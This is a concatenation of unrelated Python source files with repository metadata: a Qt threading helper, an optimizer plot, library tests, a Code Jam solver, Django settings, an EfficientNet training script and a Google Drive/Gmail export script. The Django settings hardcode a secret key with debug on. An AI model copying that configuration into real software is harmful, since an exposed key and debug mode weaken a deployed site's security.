exception = sys.exc_info()
result = None
if not event._exceptions_in_main:
raise
finally:
event._returnval.put([result, exception])
return True
_caller = None
def init_invoke_in_app():
global _caller
_caller = Caller()
_wait_for_quit = False
def destroy_invoke_in_app():
global _caller, _wait_for_quit
_caller = None
_wait_for_quit = False
def _start_app_thread():
app = QtWidgets.QApplication([])
font = app.font()
font.setPixelSize(_font_size)
app.setFont(font)
app.setQuitOnLastWindowClosed(False)
init_invoke_in_app()
# init finished, can draw now
return app
_wait_for_quit = False
def wait_for_quit():
global _wait_for_quit
_wait_for_quit = True
_app_lock = threading.Lock()
def invoke_in_app_thread(fn, *args, **kwargs):
"""Queue up the executing of a function in the main thread and return immediately.
This function queues up a custom :code:`QEvent` to the Qt event loop.
This event executes the specified function :code:`fn` in the Python
MainThread with the specified arguments and keyword arguments, and returns
a Python Queue which will eventually hold the result from the executing of
:code:`fn`. To access the result, use :func:`qtutils.invoke_in_main.get_inmain_result`.
This function can be used from the MainThread, but such use will just directly call the function, bypassing the Qt event loop.
Arguments:
fn: A reference to the function or method to run in the MainThread.
*args: Any arguments to pass to :code:`fn` when it is called from the
MainThread.
**kwargs: Any keyword arguments to pass to :code:`fn` when it is called
from the MainThread
Returns:
A Python Queue which will eventually hold the result
:code:`(fn(*args, **kwargs), exception)` where
:code:`exception=[type,value,traceback]`.
"""
_app_lock.acquire()
try:
if _caller is None:
app = _start_app_thread()
ex = None
try:
result = fn(*args, **kwargs)
except Exception as e:
ex = e
destroy_invoke_in_app()
app.quit()
app = None
if ex is not None:
raise ex
return result
elif _wait_for_quit: # the app is quitting. don't show the dialog
return None
result = get_in_app_thread_result(_in_app_thread_later(fn, True, *args, **kwargs))
return result
finally:
_app_lock.release()
def _in_app_thread_later(fn, exceptions_in_main, *args, **kwargs):
"""Asks the mainloop to call a function when it has time. Immediately
returns the queue that was sent to the mainloop. A call to queue.get()
will return a list of [result,exception] where exception=[type,value,traceback]
of the exception. Functions are guaranteed to be called in the order
they were requested."""
queue = Queue()
QCoreApplication.postEvent(_caller, CallEvent(queue, exceptions_in_main, fn, *args, **kwargs))
return queue
def get_in_app_thread_result(queue):
""" Processes the result of :func:`qtutils.invoke_in_main.inmain_later`.
This function takes the queue returned by :code:`inmain_later` and blocks
until a result is obtained. If an exception occurred when executing the
function in the MainThread, it is raised again here (it is also raised in the
MainThread). If no exception was raised, the result from the execution of the
function is returned.
Arguments:
queue: The Python Queue object returned by :code:`inmain_later`
Returns:
The result from executing the function specified in the call to
:code:`inmain_later`
"""
result, exception = queue.get()
if exception is not None:
_reraise(exception)
return result
_font_size = 18
def set_app_font(size: int):
global _font_size
_font_size = size
def invoke_in_thread():
""" A decorator which enforces the execution of the decorated thread to occur in the MainThread.
Returns:
The decorator returns a function that has wrapped the decorated function
in the appropriate call to :code:`inmain` or :code:`inmain_later` (if
you are unfamiliar with how decorators work, please see the Python
documentation).
When calling the decorated function, the result is either the result of
the function executed in the MainThread (if :code:`wait_for_return=True`)
or a Python Queue to be used with
:func:`qtutils.invoke_in_main.get_inmain_result` at a later time.
"""
def wrap(fn):
"""A decorator which sets any function to always run in the main thread."""
@functools.wraps(fn)
def f(*args, **kwargs):
return invoke_in_app_thread(fn, *args, **kwargs)
return f
return wrap
| [
"royqh1979@gmail.com"
] | royqh1979@gmail.com |
d576ee243987e026e7db286752d55ddc344a1942 | 8cdad42543eb9d6a3c3a9ddf5a3d768a09aef78d | /lesson3/visual_optimizer/example_0.py | 1026e1151f0da929d1dfc302dc63cbde89018b05 | [] | no_license | SoulDuck/Edu_DL | b81b4ac871864440210b109c7fc76c7cc2c54391 | 3ab10fa147bb6282517a413a5c2c465f0277cebe | refs/heads/master | 2022-11-27T08:18:39.676980 | 2019-03-17T14:44:27 | 2019-03-17T14:44:27 | 155,827,188 | 0 | 1 | null | 2022-11-01T20:28:40 | 2018-11-02T07:04:08 | Jupyter Notebook | UTF-8 | Python | false | false | 2,289 | py | import matplotlib.pyplot as plt
import autograd.numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.colors import LogNorm
from matplotlib import animation
from IPython.display import HTML
from autograd import elementwise_grad, value_and_grad
from scipy.optimize import minimize
from collections import defaultdict
from itertools import zip_longest
from functools import partial
f = lambda x, y: (1.5 - x + x*y)**2 + (2.25 - x + x*y**2)**2 + (2.625 - x + x*y**3)**2
xmin, xmax, xstep = -4.5, 4.5, .2
ymin, ymax, ystep = -4.5, 4.5, .2
x, y = np.meshgrid(np.arange(xmin, xmax + xstep, xstep), np.arange(ymin, ymax + ystep, ystep))
z = f(x, y)
minima = np.array([3., .5]) # minima 인 곳을 별로 표시함
f(*minima) # minima value : 0
minima_ = minima.reshape(-1, 1)
fig = plt.figure(figsize=(8, 5))
ax = plt.axes(projection='3d', elev=50, azim=-50)
ax.plot(*minima_, f(*minima_), 'r*', markersize=10)
ax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1,
edgecolor='c', alpha=0.5, cmap=plt.cm.jet, linewidth=0.5)
ax.view_init(30, 10)
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
ax.set_zlabel('$z$')
ax.set_xlim((xmin, xmax))
ax.set_ylim((ymin, ymax))
plt.show()
plt.close()
# Optimizer
x0 = np.array([3., 4.])
func = value_and_grad(lambda args: f(*args))
def make_minimize_cb(path=[]):
def minimize_cb(xk):
# note that we make a deep copy of xk
path.append(np.copy(xk))
return minimize_cb
path_ = [x0]
res = minimize(func, x0=x0, method='Newton-CG',
jac=True, tol=1e-20, callback=make_minimize_cb(path_))
print(path_)
path_ = np.asarray(path_)
path = path_.T
fig = plt.figure(figsize=(8, 5))
ax = plt.axes(projection='3d', elev=50, azim=-50)
# logNorm -> Normalize a given value to the 0-1 range on a log scale
ax.plot_surface(x, y, z, norm=LogNorm(), rstride=2, cstride=2, edgecolor='none', alpha=0.5, cmap=plt.cm.jet)
ax.quiver(path[0,:-1], path[1,:-1], f(*path[::,:-1]),
path[0,1:] - path[0,:-1], path[1,1:] - path[1,:-1], f(*(path[::,1:] - path[::,:-1])),
color='k')
ax.plot(*minima_, f(*minima_), 'r*', markersize=10)
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
ax.set_zlabel('$z$')
ax.set_xlim((xmin, xmax))
ax.set_ylim((ymin, ymax))
plt.show()
plt.close()
| [
"plznw4me@naver.com"
] | plznw4me@naver.com |
26313529fa41479b7cac8f822e78c9ce13050b70 | a5b66100762c0ca7076de26645ef1b732e0ee2d8 | /test_python_toolbox/test_cute_iter_tools/test_iterate_overlapping_subsequences.py | acddca4ead74e7042a28fa22d1433a03de3ae3e3 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cool-RR/python_toolbox | 63400bbc004c63b32fe421b668a64bede4928e90 | cb9ef64b48f1d03275484d707dc5079b6701ad0c | refs/heads/master | 2022-01-26T14:41:29.194288 | 2021-12-25T06:49:40 | 2021-12-25T06:49:40 | 3,066,283 | 130 | 15 | NOASSERTION | 2021-12-25T06:49:41 | 2011-12-29T01:39:51 | Python | UTF-8 | Python | false | false | 5,491 | py | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''Testing module for `cute_iter_tools.iterate_overlapping_subsequences`.'''
import collections
from python_toolbox import gc_tools
from python_toolbox import nifty_collections
from python_toolbox import cute_testing
from python_toolbox import sequence_tools
from python_toolbox.cute_iter_tools import iterate_overlapping_subsequences
def test_length_2():
# `iterate_overlapping_subsequences` returns an iterator, not a sequence:
assert not isinstance(
iterate_overlapping_subsequences(list(range(4))),
collections.abc.Sequence
)
assert tuple(iterate_overlapping_subsequences(list(range(4)))) == \
tuple(iterate_overlapping_subsequences(range(4))) == \
((0, 1), (1, 2), (2, 3))
assert tuple(iterate_overlapping_subsequences(list(range(4)),
wrap_around=True)) == \
tuple(iterate_overlapping_subsequences(range(4),
wrap_around=True)) ==\
((0, 1), (1, 2), (2, 3), (3, 0))
assert tuple(iterate_overlapping_subsequences('meow')) == \
(('m', 'e'), ('e', 'o'), ('o', 'w'))
def test_iterable_too_short():
with cute_testing.RaiseAssertor(NotImplementedError):
tuple(iterate_overlapping_subsequences([1], wrap_around=True))
def test_various_lengths():
assert tuple(iterate_overlapping_subsequences(range(7), length=3)) == \
((0, 1, 2), (1, 2, 3), (2, 3, 4), (3, 4, 5), (4, 5, 6))
assert tuple(iterate_overlapping_subsequences(range(7), length=4)) == \
((0, 1, 2, 3), (1, 2, 3, 4), (2, 3, 4, 5), (3, 4, 5, 6))
assert tuple(iterate_overlapping_subsequences(range(7), length=5)) == \
((0, 1, 2, 3, 4), (1, 2, 3, 4, 5), (2, 3, 4, 5, 6))
assert tuple(iterate_overlapping_subsequences(range(7), length=1)) == \
tuple(range(7))
assert tuple(iterate_overlapping_subsequences(range(7), length=4,
wrap_around=True)) == ((0, 1, 2, 3), (1, 2, 3, 4), (2, 3, 4, 5),
(3, 4, 5, 6), (4, 5, 6, 0), (5, 6, 0, 1), (6, 0, 1, 2))
assert tuple(iterate_overlapping_subsequences(range(7), length=5,
wrap_around=True)) == ((0, 1, 2, 3, 4), (1, 2, 3, 4, 5),
(2, 3, 4, 5, 6), (3, 4, 5, 6, 0), (4, 5, 6, 0, 1), (5, 6, 0, 1, 2),
(6, 0, 1, 2, 3))
def test_lazy_tuple():
lazy_tuple = \
iterate_overlapping_subsequences(range(7), length=3, lazy_tuple=True)
assert isinstance(lazy_tuple, nifty_collections.LazyTuple)
assert not lazy_tuple.collected_data
assert lazy_tuple == \
((0, 1, 2), (1, 2, 3), (2, 3, 4), (3, 4, 5), (4, 5, 6))
def test_garbage_collection():
garbage_collected = set()
class GarbageNoter:
def __init__(self, n):
assert isinstance(n, int)
self.n = n
def __del__(self):
garbage_collected.add(self.n)
iterable = (GarbageNoter(i) for i in range(7))
consecutive_subsequences_iterator = \
iterate_overlapping_subsequences(iterable, length=3)
def assert_garbage_collected(indexes):
gc_tools.collect()
assert set(indexes) == garbage_collected
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected((0,))
next(consecutive_subsequences_iterator)
assert_garbage_collected((0, 1))
next(consecutive_subsequences_iterator)
assert_garbage_collected((0, 1, 2))
next(consecutive_subsequences_iterator)
assert_garbage_collected((0, 1, 2, 3))
with cute_testing.RaiseAssertor(StopIteration):
next(consecutive_subsequences_iterator)
assert_garbage_collected((0, 1, 2, 3, 4, 5, 6))
def test_garbage_collection_wrap_around():
garbage_collected = set()
class GarbageNoter:
def __init__(self, n):
assert isinstance(n, int)
self.n = n
def __del__(self):
garbage_collected.add(self.n)
iterable = (GarbageNoter(i) for i in range(7))
consecutive_subsequences_iterator = \
iterate_overlapping_subsequences(iterable, length=3, wrap_around=True)
def assert_garbage_collected(indexes):
gc_tools.collect()
assert set(indexes) == garbage_collected
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected(())
next(consecutive_subsequences_iterator)
assert_garbage_collected((2,))
next(consecutive_subsequences_iterator)
assert_garbage_collected((2, 3))
next(consecutive_subsequences_iterator)
assert_garbage_collected((2, 3, 4))
next(consecutive_subsequences_iterator)
assert_garbage_collected((2, 3, 4, 5))
with cute_testing.RaiseAssertor(StopIteration):
next(consecutive_subsequences_iterator)
assert_garbage_collected((0, 1, 2, 3, 4, 5, 6))
def test_short_iterables():
assert tuple(iterate_overlapping_subsequences([1])) == ()
assert tuple(iterate_overlapping_subsequences([1], length=7)) == ()
| [
"ram@rachum.com"
] | ram@rachum.com |
02fee580a449534a696d8a009b72407c8e92397c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3_neat/16_0_3_SGer_coinjam.py | ddadbc4f209398f6d0184b2127b91ea3acef6fb2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,674 | py | import sys
def primeCheck(n):
# sieve holds all the numbers that still can be divisors
upperBorder = int(n**0.5)+1
sieve = [True]*upperBorder
sieve[0] = False
sieve[1] = False
for i in xrange(upperBorder):
# If we already know that the number is not a divisor, just skip it
if (sieve[i] == False):
continue
# Return divisor
if (n % i == 0):
return i
# Eliminate all multiples of the non-divisor
else:
for j in xrange(i, int(upperBorder / i), i):
sieve[j] = False
return None
if (len(sys.argv) < 2):
print "Need inputfile as argument"
exit(1)
#read file
input = list()
with open(sys.argv[1], 'r') as f:
input = f.read().splitlines()
input.pop(0)
#convert to int list
input = map(lambda s: map(int, s.split(' ')), input)
def listToStr(indexList):
indexListStr = ""
for index in indexList:
indexListStr += str(index)+" "
indexListStr = indexListStr[:-1]
return indexListStr
#compute
output = list()
for (N, J) in input:
for i in xrange(int("1"+"0"*(N-2),2), int("1"*(N-1),2)+1):
if (len(output) >= J):
break
bitString = bin(i)[2:]+"1"
isPrime = False
divisors = list()
# Find Divisors or that one of the interpretations is prime
for base in range(2,11):
n = int(bitString,base)
divisor = primeCheck(n)
if (divisor is None):
isPrime = True
break
else:
divisors.append(divisor)
print "n: "+str(n)+" d: "+str(divisor)
# If none of the interpretations were prime, we found a jamcoin
if (not isPrime):
output.append(str(bitString)+" "+listToStr(divisors))
#write file
with open('output_coinjam.txt', 'w') as f:
f.write("Case #1:\n")
for line in output:
f.write(line+"\n")
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
3976434872d602cbd85f8af7adc7780d589d700f | 0806d939ef0e8218c0f727e025eb0b3bb328d343 | /vote/polls/settings.py | 57025f38b164cace2fa091fd11f661cd86271aaf | [] | no_license | aiegoo/django-web | bcd89687d951e0877000c23230661ce566144e78 | 5476ed77cf95919d9b825f4cef03d42f217768ce | refs/heads/master | 2021-07-17T01:20:24.279227 | 2020-09-27T05:15:05 | 2020-09-27T05:15:05 | 215,240,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | """
Django settings for polls project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'j^7=0_6j4v3nqf3sodtvmra8f7r76d872&b6()b@ie9k6lpdna'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['178.128.223.232', 'localhost', '127.0.0.0']
# Application definition
INSTALLED_APPS = [
'vote.apps.VoteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'polls.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'polls.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"eozz21@gmail.com"
] | eozz21@gmail.com |
7c5f7ab7b3a9edaffcf8c46037bdc4f1be5a349d | 871e1b0295c0fbbfca8191236d674866cf62ff01 | /TrainB7_NAR1_noisy-student.py | 6eee387bf281a62a200d38e6acdd02993bd6a410 | [] | no_license | Peckkie/USAI_ABnormal_Screening | ce31a813e9303a7d43def912ab731cc633268cb7 | 82cd63ac9ab72fbe68eae254c15c7bf7ef906022 | refs/heads/master | 2023-02-16T13:32:33.678500 | 2021-01-07T02:36:35 | 2021-01-07T02:36:35 | 277,981,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,082 | py | import PIL
from keras import models
from keras import layers
from tensorflow.keras import optimizers
import os
import glob
import shutil
import sys
import numpy as np
from skimage.io import imread
import matplotlib.pyplot as plt
import os
from tensorflow.keras import callbacks
import pandas as pd
from keras.utils import generic_utils
os.environ["CUDA_VISIBLE_DEVICES"]="0"
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
batch_size = 32
epochs = 200
#Train
dataframe = pd.read_csv( '/media/tohn/SSD/ImageForTrainTest/train.csv')
base_dir = '/media/tohn/SSD/ImageForTrainTest/'
os.chdir(base_dir)
train_dir = os.path.join(base_dir, 'train')
#validation
valframe = pd.read_csv( '/media/tohn/SSD/ImageForTrainTest/validation.csv')
validation_dir = os.path.join(base_dir, 'validation')
from efficientnet.keras import EfficientNetB7 as Net
from efficientnet.keras import center_crop_and_resize, preprocess_input
conv_base = Net(weights='noisy-student')
height = width = conv_base.input_shape[1]
input_shape = (height, width, 3)
# loading pretrained conv base model
conv_base = Net(weights='noisy-student', include_top=False, input_shape=input_shape)
# create new model with a new classification layer
x = conv_base.output
global_average_layer = layers.GlobalAveragePooling2D(name = 'head_pooling')(x)
dropout_layer_1 = layers.Dropout(0.50,name = 'head_dropout')(global_average_layer)
prediction_layer = layers.Dense(2, activation='softmax',name = 'prediction_layer')(dropout_layer_1)
model = models.Model(inputs= conv_base.input, outputs=prediction_layer)
model.summary()
#showing before&after freezing
print('This is the number of trainable layers '
'before freezing the conv base:', len(model.trainable_weights))
#conv_base.trainable = False # freeze เพื่อรักษา convolutional base's weight
for layer in conv_base.layers:
layer.trainable = False
print('This is the number of trainable layers '
'after freezing the conv base:', len(model.trainable_weights)) #freez แล้วจะเหลือ max pool and dense
from tensorflow.keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=30,
width_shift_range=0.2,
height_shift_range=0.2,
brightness_range=[0.5,1.5],
shear_range=0.4,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_dataframe(
dataframe = dataframe,
directory = train_dir,
x_col = 'Path Crop',
y_col = 'Class',
target_size = (height, width),
batch_size=batch_size,
color_mode= 'rgb',
class_mode='categorical')
test_generator = test_datagen.flow_from_dataframe(
dataframe = valframe,
directory = validation_dir,
x_col = 'Path Crop',
y_col = 'Class',
target_size = (height, width),
batch_size=batch_size,
color_mode= 'rgb',
class_mode='categorical')
os.chdir('/media/tohn/SSD/trainEffbyB/R1')
root_logdir = '/media/tohn/SSD/trainEffbyB/R1/my_logs_B7noisy'
def get_run_logdir():
import time
run_id = time.strftime("run_%Y_%m_%d_%H_%M_%S")
return os.path.join(root_logdir,run_id)
run_logdir = get_run_logdir()
tensorboard_cb = callbacks.TensorBoard(log_dir = run_logdir)
# os.makedirs("./models", exist_ok=True)
def avoid_error(gen):
while True:
try:
data, labels = next(gen)
yield data, labels
except:
pass
#Training
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=['acc'])
history = model.fit_generator(
avoid_error(train_generator),
steps_per_epoch= len(dataframe)//batch_size,
epochs=epochs,
validation_data=avoid_error(test_generator),
validation_steps= len(valframe) //batch_size,
callbacks = [tensorboard_cb])
model.save('./models/B7_R1_noisy.h5')
| [
"w_yupaporn@kkumail.com"
] | w_yupaporn@kkumail.com |
b5b926c106c60946a48179e4795ab856cd8820bb | ac4b9385b7ad2063ea51237fbd8d1b74baffd016 | /.history/google/gmail_extract_20210219015211.py | c4d7dfe90ce25f2f1ff0dd84344c6a9d2cfe242a | [] | no_license | preethanpa/ssoemprep | 76297ef21b1d4893f1ac2f307f60ec72fc3e7c6f | ce37127845253c768d01aeae85e5d0d1ade64516 | refs/heads/main | 2023-03-09T00:15:55.130818 | 2021-02-20T06:54:58 | 2021-02-20T06:54:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,993 | py | from __future__ import print_function
import pickle
import os.path
import io
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
from oauth2client.service_account import ServiceAccountCredentials
from google.oauth2 import service_account
import googleapiclient.discovery
import inspect
import sys
import json
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly'
]
# The ID of a sample document.
# DOCUMENT_ID = '1bQkFcQrWFHGlte8oTVtq_zyKGIgpFlWAS5_5fi8OzjY'
DOCUMENT_ID = '1sXQie19gQBRHODebxBZv4xUCJy-9rGpnlpM7_SUFor4'
# SERVICE_ACCOUNT_FILE = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/google/domain-wide-credentials-gdrive.json'
SERVICE_ACCOUNT_FILE = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/google/app-automation-service-account-thirdrayai-1612747564720-415d6ebd6001.json'
UPLOAD_FILE_LOCATION = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/documents/pdf/'
doc_types = {
"application/vnd.google-apps.document": "gdoc",
# "application/vnd.google-apps.folder": "folder",
"application/vnd.google-apps.spreadsheet": "gsheet",
"application/vnd.google-apps.presentation": "gslide",
"application/vnd.openxmlformats-officedocument.wordprocessingml.document": "docx"
}
drive_files_list = [] if (sys.argv is None or sys.argv[1] is None) else json.loads(sys.argv[1])
job_id = drive_files_list.get("job_id")
email_id = None if (sys.argv is None or sys.argv[1] is None) else json.loads(sys.argv[1]).email_id
document_id = ''
def get_resource(domain_wide_delegate=False, user_to_impersonate=None):
"""Prepare a Google Drive resource object based on credentials.
"""
credentials = None
# use subject in case of domain-wide delegation
if domain_wide_delegate:
if user_to_impersonate is not None:
credentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES, subject=user_to_impersonate)
else:
credentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES)
if credentials is None:
return credentials
else:
drive_service = build('drive', 'v3', credentials=credentials)
return drive_service
def download_drive_file(resource=None, document_id=None, google_file_type='gdoc', target_type=None, target_location=None):
"""Downloads a Google Drive file using the provided resource.
If google_file_type is passed as None, then 'gdoc' / Google Doc is default.
If target_type is passed as None, then 'application/pdf' is default.
If location is none, then use environment variable UPLOAD_FILE_LOCATION as default
"""
# print(dir(resource.files())) #Get resource methods with dir.
if resource is None:
raise Exception('Invalid credentials. Provide subject email addredd for Drive-wide delegation')
else:
extension, mimeType = extension_mime_type(google_file_type, target_type)
try:
content = resource.files().export(fileId=document_id, mimeType=mimeType).execute()
try:
with open(target_location+google_file_type+'-'+document_id+extension, "wb") as file:
file.write(content)
return {"file": google_file_type+'-'+document_id+extension}
except Exception as exc_in:
return
# return {"document_id": document_id, "status": "Exception in with open", "message": exc_in}
except Exception as exc_out:
return
# return {"document_id": document_id, "status": "Exception in content = resource_files...", "message": exc_out}
def extension_mime_type(google_file_ext=None, format=None):
export_type = None
if google_file_ext is not None:
if google_file_ext == 'gdoc':
if format == 'docx':
export_type = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
elif format == 'epub':
export_type = 'application/epub+zip'
elif format == 'html':
export_type = 'text/html'
elif format == 'odt':
export_type = 'application/vnd.oasis.opendocument.text'
elif format == 'pdf':
export_type = 'application/pdf'
elif format == 'rtf':
export_type = 'application/rtf'
elif format == 'tex':
export_type = 'application/zip'
elif format == 'txt':
export_type = 'text/plain'
elif format == 'html.zip':
export_type = 'application/zip'
else:
raise Exception('Unknown format "{}"'.format(format))
elif google_file_ext == 'gsheet':
if format == 'csv':
export_type = 'text/csv'
elif format == 'html.zip':
export_type = 'application/zip'
elif format == 'ods':
export_type = 'application/x-vnd.oasis.opendocument.spreadsheet'
elif format == 'pdf':
export_type = 'application/pdf'
elif format == 'tsv':
export_type = 'text/tab-separated-values'
elif format == 'xlsx':
export_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
else:
raise Exception('Unknown format "{}"'.format(format))
elif google_file_ext == 'gslide':
if format == 'odp':
export_type = 'application/vnd.oasis.opendocument.presentation'
elif format == 'pdf':
export_type = 'application/pdf'
elif format == 'pptx':
export_type = 'application/vnd.openxmlformats-officedocument.presentationml.presentation'
elif format == 'txt':
export_type = 'text/plain'
else:
raise Exception('Unknown format "{}"'.format(format))
else:
raise Exception('Unknown Google document extension "{}"'.format(google_file_ext))
return '.'+format, export_type
def get_email_labels(user, creds):
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
service = build('gmail', 'v1', credentials=creds)
# Call the Gmail API
results = service.users().labels().list(userId=user).execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if email_id is not None:
pass
if drive_files_list == []:
print(json.dumps(drive_files_list))
else:
location = os.path.join('/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/drive_documents/', job_id+'/pdf/')
os.makedirs(location)
location_html = os.path.join('/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/drive_documents/', job_id+'/html/')
os.makedirs(location_html)
response_message = {
"job_id": job_id,
"status": "OK",
"processed_files": []
}
for index, item in enumerate(drive_files_list.get('files')):
try:
google_file_type = doc_types[item.get('mimeType')]
drive_document_id = item.get('id')
target_file_type = "pdf"
dl_response = download_drive_file(resource=get_resource(domain_wide_delegate=False), document_id=drive_document_id, google_file_type=google_file_type, target_type=target_file_type, target_location=location)
response_message["processed_files"].append(dl_response)
except KeyError as ke:
pass
print(json.dumps(response_message))
# print(download_drive_file(resource=get_resource(domain_wide_delegate=False)), google_file_type=google_file_type, target_type=target_file_type, target_location=location) | [
"{abhi@third-ray.com}"
] | {abhi@third-ray.com} |
aff1b4c074ab609ca6ddccae8c356a723e774856 | ed98f15f0daf3a9a0cb033bded3b97207b6a3382 | /pylonsprojectjp/apps/admin/__init__.py | 59a11c4220e220e1545a4c57f14f03913d4fde95 | [] | no_license | knzm/pylonsprojectjp_site | 56b4b3eb400f3588a97c1898759a53abca553635 | 4b2fd1875ab1c4e4d2e5a2ba946b6c462bc2d90e | refs/heads/master | 2021-01-19T11:17:30.521824 | 2014-01-24T15:00:30 | 2014-01-24T15:00:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | # -*- coding: utf-8 -*-
from .utils import admin_config, ListColumn
__all__ = ['admin_config', 'ListColumn']
def includeme(config):
config.add_directive('add_admin', '.utils.add_admin')
| [
"nozom.kaneko@gmail.com"
] | nozom.kaneko@gmail.com |
ac840a5275bbbdffb5197eccb724645e65106c64 | b7e9057d7083759cf5193083b4864f6ca9dd9144 | /Longest_Increasing_Subsequence.py | 469379278526ef4b76f1ab1bd58b65c543a7cf66 | [] | no_license | vishalagrawalit/Competitive-Programming | 21a5c63de4fdbe8cbbfeb8b62d62af3c79972cad | b34faafd15f3e97050a8e2c39e3358e7a8ffdc5a | refs/heads/master | 2021-12-24T08:58:20.269152 | 2017-12-14T17:59:05 | 2017-12-14T17:59:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | def search(arr,l,r,key):
while(r-l>1):
m = l+(r-l)//2
if (arr[m] >= key):
r = m
else:
l = m
return r
def sequence(arr):
if len(arr)==0:
return 0
tail = [0]*len(arr)
length = 1
tail[0] = arr[0]
for i in range(1,len(arr)):
if arr[i] < tail[0]:
tail[0] = arr[i]
elif arr[i] > tail[length - 1]:
tail[length]=arr[i]
length +=1
else:
tail[search(tail, -1, length-1, arr[i])] = arr[i]
return length
arr = [2,5,3,7,11,8,10,13,6,75]
print(sequence(arr))
| [
"vishvishu14@gmail.com"
] | vishvishu14@gmail.com |
a0598efb487953b92293d2f61626bf178d0b4e7d | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/mpl_toolkits/axisartist/clip_path.py | d494365ef3c9347f3cdc5882e5efd8a907ad1b7f | [
"MIT",
"BSD-3-Clause"
